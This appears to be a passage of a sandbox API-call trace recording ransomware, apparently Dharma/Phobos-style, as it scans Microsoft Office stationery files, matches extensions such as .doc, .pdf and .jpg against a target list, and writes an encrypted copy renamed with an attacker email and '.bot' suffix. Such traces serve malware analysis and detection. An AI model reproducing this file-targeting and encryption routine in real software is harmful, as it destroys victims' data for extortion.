	[0041.666] lstrlenW (lpString=".rar") returned 4
	[0041.666] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0041.666] lstrlenW (lpString=".bz2") returned 4
	[0041.666] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0041.666] lstrlenW (lpString=".7z") returned 3
	[0041.666] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0041.666] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66
	[0041.666] lstrlenW (lpString=".dbf") returned 4
	[0041.666] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0041.666] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66
	[0041.666] lstrlenW (lpString=".1cd") returned 4
	[0041.666] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0041.666] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66
	[0041.666] lstrlenW (lpString=".jpg") returned 4
	[0041.666] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0041.666] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66
	[0041.666] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66
	[0041.666] lstrlenW (lpString=".doc") returned 4
	[0041.667] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0041.667] lstrlenW (lpString=".docx") returned 5
	[0041.667] lstrcmpiW (lpString1=".docx", lpString2="o.emf") returned -1
	[0041.667] lstrlenW (lpString=".pdf") returned 4
	[0041.667] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0041.667] lstrlenW (lpString=".xls") returned 4
	[0041.667] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0041.667] lstrlenW (lpString=".xlsx") returned 5
	[0041.667] lstrcmpiW (lpString1=".xlsx", lpString2="o.emf") returned -1
	[0041.667] lstrlenW (lpString=".ppt") returned 4
	[0041.667] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0041.667] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66
	[0041.667] lstrlenW (lpString=".zip") returned 4
	[0041.667] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0041.667] lstrlenW (lpString=".rar") returned 4
	[0041.667] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0041.667] lstrlenW (lpString=".bz2") returned 4
	[0041.667] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0041.667] lstrlenW (lpString=".7z") returned 3
	[0041.667] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0041.667] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66
	[0041.667] lstrlenW (lpString=".dbf") returned 4
	[0041.667] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0041.667] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66
	[0041.667] lstrlenW (lpString=".1cd") returned 4
	[0041.667] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0041.667] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66
	[0041.667] lstrlenW (lpString=".jpg") returned 4
	[0041.667] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0041.667] lstrcmpiW (lpString1=".jpg", lpString2=".bot") returned 1
	[0041.667] lstrlenW (lpString="Monet.jpg") returned 9
	[0041.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0041.668] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2209) returned 1
	[0041.668] CloseHandle (hObject=0x1f8) returned 1
	[0041.668] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg")) returned 0x20
	[0041.668] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0041.668] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67
	[0041.668] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67
	[0041.668] lstrlenW (lpString=".doc") returned 4
	[0041.668] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0041.668] lstrlenW (lpString=".docx") returned 5
	[0041.668] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1
	[0041.668] lstrlenW (lpString=".pdf") returned 4
	[0041.668] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0041.668] lstrlenW (lpString=".xls") returned 4
	[0041.668] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0041.668] lstrlenW (lpString=".xlsx") returned 5
	[0041.668] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1
	[0041.669] lstrlenW (lpString=".ppt") returned 4
	[0041.669] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0041.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67
	[0041.669] lstrlenW (lpString=".zip") returned 4
	[0041.669] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0041.669] lstrlenW (lpString=".rar") returned 4
	[0041.669] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0041.669] lstrlenW (lpString=".bz2") returned 4
	[0041.669] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0041.669] lstrlenW (lpString=".7z") returned 3
	[0041.669] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0041.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67
	[0041.669] lstrlenW (lpString=".dbf") returned 4
	[0041.669] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0041.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67
	[0041.669] lstrlenW (lpString=".1cd") returned 4
	[0041.669] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0041.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67
	[0041.669] lstrlenW (lpString=".jpg") returned 4
	[0041.669] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0041.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67
	[0041.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67
	[0041.669] lstrlenW (lpString=".doc") returned 4
	[0041.669] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0041.669] lstrlenW (lpString=".docx") returned 5
	[0041.669] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1
	[0041.669] lstrlenW (lpString=".pdf") returned 4
	[0041.669] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0041.669] lstrlenW (lpString=".xls") returned 4
	[0041.669] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0041.669] lstrlenW (lpString=".xlsx") returned 5
	[0041.669] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1
	[0041.669] lstrlenW (lpString=".ppt") returned 4
	[0041.669] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0041.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67
	[0041.670] lstrlenW (lpString=".zip") returned 4
	[0041.670] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0041.670] lstrlenW (lpString=".rar") returned 4
	[0041.670] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0041.670] lstrlenW (lpString=".bz2") returned 4
	[0041.670] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0041.670] lstrlenW (lpString=".7z") returned 3
	[0041.670] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0041.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67
	[0041.670] lstrlenW (lpString=".dbf") returned 4
	[0041.670] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0041.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67
	[0041.670] lstrlenW (lpString=".1cd") returned 4
	[0041.670] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0041.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67
	[0041.670] lstrlenW (lpString=".jpg") returned 4
	[0041.670] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0041.670] lstrcmpiW (lpString1=".emf", lpString2=".bot") returned 1
	[0041.670] lstrlenW (lpString="Month_Calendar.emf") returned 18
	[0041.670] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0041.670] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=4192) returned 1
	[0041.670] CloseHandle (hObject=0x1f8) returned 1
	[0041.671] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf")) returned 0x20
	[0041.671] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0041.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76
	[0041.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76
	[0041.671] lstrlenW (lpString=".doc") returned 4
	[0041.671] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0041.671] lstrlenW (lpString=".docx") returned 5
	[0041.671] lstrcmpiW (lpString1=".docx", lpString2="r.emf") returned -1
	[0041.671] lstrlenW (lpString=".pdf") returned 4
	[0041.671] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0041.671] lstrlenW (lpString=".xls") returned 4
	[0041.671] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0041.671] lstrlenW (lpString=".xlsx") returned 5
	[0041.671] lstrcmpiW (lpString1=".xlsx", lpString2="r.emf") returned -1
	[0041.671] lstrlenW (lpString=".ppt") returned 4
	[0041.671] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0041.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76
	[0041.671] lstrlenW (lpString=".zip") returned 4
	[0041.671] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0041.671] lstrlenW (lpString=".rar") returned 4
	[0041.671] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0041.671] lstrlenW (lpString=".bz2") returned 4
	[0041.671] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0041.671] lstrlenW (lpString=".7z") returned 3
	[0041.671] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0041.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76
	[0041.671] lstrlenW (lpString=".dbf") returned 4
	[0041.671] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0041.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76
	[0041.672] lstrlenW (lpString=".1cd") returned 4
	[0041.672] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0041.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76
	[0041.672] lstrlenW (lpString=".jpg") returned 4
	[0041.672] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0041.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76
	[0041.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76
	[0041.672] lstrlenW (lpString=".doc") returned 4
	[0041.672] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0041.672] lstrlenW (lpString=".docx") returned 5
	[0041.672] lstrcmpiW (lpString1=".docx", lpString2="r.emf") returned -1
	[0041.672] lstrlenW (lpString=".pdf") returned 4
	[0041.672] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0041.672] lstrlenW (lpString=".xls") returned 4
	[0041.672] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0041.672] lstrlenW (lpString=".xlsx") returned 5
	[0041.672] lstrcmpiW (lpString1=".xlsx", lpString2="r.emf") returned -1
	[0041.672] lstrlenW (lpString=".ppt") returned 4
	[0041.672] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0041.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76
	[0041.672] lstrlenW (lpString=".zip") returned 4
	[0041.672] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0041.672] lstrlenW (lpString=".rar") returned 4
	[0041.672] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0041.672] lstrlenW (lpString=".bz2") returned 4
	[0041.672] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0041.672] lstrlenW (lpString=".7z") returned 3
	[0041.672] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0041.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76
	[0041.672] lstrlenW (lpString=".dbf") returned 4
	[0041.672] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0041.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76
	[0041.672] lstrlenW (lpString=".1cd") returned 4
	[0041.673] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0041.673] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76
	[0041.673] lstrlenW (lpString=".jpg") returned 4
	[0041.673] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0041.673] lstrcmpiW (lpString1=".emf", lpString2=".bot") returned 1
	[0041.673] lstrlenW (lpString="Music.emf") returned 9
	[0041.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0041.674] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=26036) returned 1
	[0041.674] CloseHandle (hObject=0x1f8) returned 1
	[0041.674] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf")) returned 0x20
	[0041.674] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.674] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0041.674] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67
	[0041.674] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67
	[0041.674] lstrlenW (lpString=".doc") returned 4
	[0041.674] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0041.674] lstrlenW (lpString=".docx") returned 5
	[0041.674] lstrcmpiW (lpString1=".docx", lpString2="c.emf") returned -1
	[0041.674] lstrlenW (lpString=".pdf") returned 4
	[0041.674] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0041.674] lstrlenW (lpString=".xls") returned 4
	[0041.674] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0041.674] lstrlenW (lpString=".xlsx") returned 5
	[0041.674] lstrcmpiW (lpString1=".xlsx", lpString2="c.emf") returned -1
	[0041.674] lstrlenW (lpString=".ppt") returned 4
	[0041.674] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0041.674] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67
	[0041.675] lstrlenW (lpString=".zip") returned 4
	[0041.675] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0041.675] lstrlenW (lpString=".rar") returned 4
	[0041.675] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0041.675] lstrlenW (lpString=".bz2") returned 4
	[0041.675] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0041.675] lstrlenW (lpString=".7z") returned 3
	[0041.675] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0041.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67
	[0041.675] lstrlenW (lpString=".dbf") returned 4
	[0041.675] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0041.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67
	[0041.675] lstrlenW (lpString=".1cd") returned 4
	[0041.675] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0041.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67
	[0041.675] lstrlenW (lpString=".jpg") returned 4
	[0041.675] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0041.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67
	[0041.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67
	[0041.675] lstrlenW (lpString=".doc") returned 4
	[0041.675] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0041.675] lstrlenW (lpString=".docx") returned 5
	[0041.675] lstrcmpiW (lpString1=".docx", lpString2="c.emf") returned -1
	[0041.675] lstrlenW (lpString=".pdf") returned 4
	[0041.675] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0041.675] lstrlenW (lpString=".xls") returned 4
	[0041.675] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0041.675] lstrlenW (lpString=".xlsx") returned 5
	[0041.675] lstrcmpiW (lpString1=".xlsx", lpString2="c.emf") returned -1
	[0041.675] lstrlenW (lpString=".ppt") returned 4
	[0041.675] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0041.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67
	[0041.675] lstrlenW (lpString=".zip") returned 4
	[0041.675] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0041.676] lstrlenW (lpString=".rar") returned 4
	[0041.676] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0041.676] lstrlenW (lpString=".bz2") returned 4
	[0041.676] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0041.676] lstrlenW (lpString=".7z") returned 3
	[0041.676] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0041.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67
	[0041.676] lstrlenW (lpString=".dbf") returned 4
	[0041.676] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0041.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67
	[0041.676] lstrlenW (lpString=".1cd") returned 4
	[0041.676] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0041.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67
	[0041.676] lstrlenW (lpString=".jpg") returned 4
	[0041.676] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0041.676] lstrcmpiW (lpString1=".jpg", lpString2=".bot") returned 1
	[0041.676] lstrlenW (lpString="Notebook.jpg") returned 12
	[0041.676] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0041.677] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2950) returned 1
	[0041.677] CloseHandle (hObject=0x1f8) returned 1
	[0041.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg")) returned 0x20
	[0041.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0041.677] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70
	[0041.677] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70
	[0041.677] lstrlenW (lpString=".doc") returned 4
	[0041.677] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0041.677] lstrlenW (lpString=".docx") returned 5
	[0041.677] lstrcmpiW (lpString1=".docx", lpString2="k.jpg") returned -1
	[0041.677] lstrlenW (lpString=".pdf") returned 4
	[0041.677] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0041.677] lstrlenW (lpString=".xls") returned 4
	[0041.677] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0041.678] lstrlenW (lpString=".xlsx") returned 5
	[0041.678] lstrcmpiW (lpString1=".xlsx", lpString2="k.jpg") returned -1
	[0041.678] lstrlenW (lpString=".ppt") returned 4
	[0041.678] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0041.678] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70
	[0041.678] lstrlenW (lpString=".zip") returned 4
	[0041.678] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0041.678] lstrlenW (lpString=".rar") returned 4
	[0041.678] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0041.678] lstrlenW (lpString=".bz2") returned 4
	[0041.678] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0041.678] lstrlenW (lpString=".7z") returned 3
	[0041.678] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0041.678] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70
	[0041.678] lstrlenW (lpString=".dbf") returned 4
	[0041.678] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0042.030] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.030] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.031] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0042.032] GetLastError () returned 0x0
	[0042.032] ReadFile (in: hFile=0x1f0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x621, lpOverlapped=0x0) returned 1
	[0042.034] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x630, lpOverlapped=0x0) returned 1
	[0042.035] ReadFile (in: hFile=0x1f0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0042.035] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0042.035] SetEndOfFile (hFile=0x1a0) returned 1
	[0042.035] CloseHandle (hObject=0x1a0) returned 1
	[0042.036] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.036] SetEndOfFile (hFile=0x1f0) returned 1
	[0042.037] CloseHandle (hObject=0x1f0) returned 1
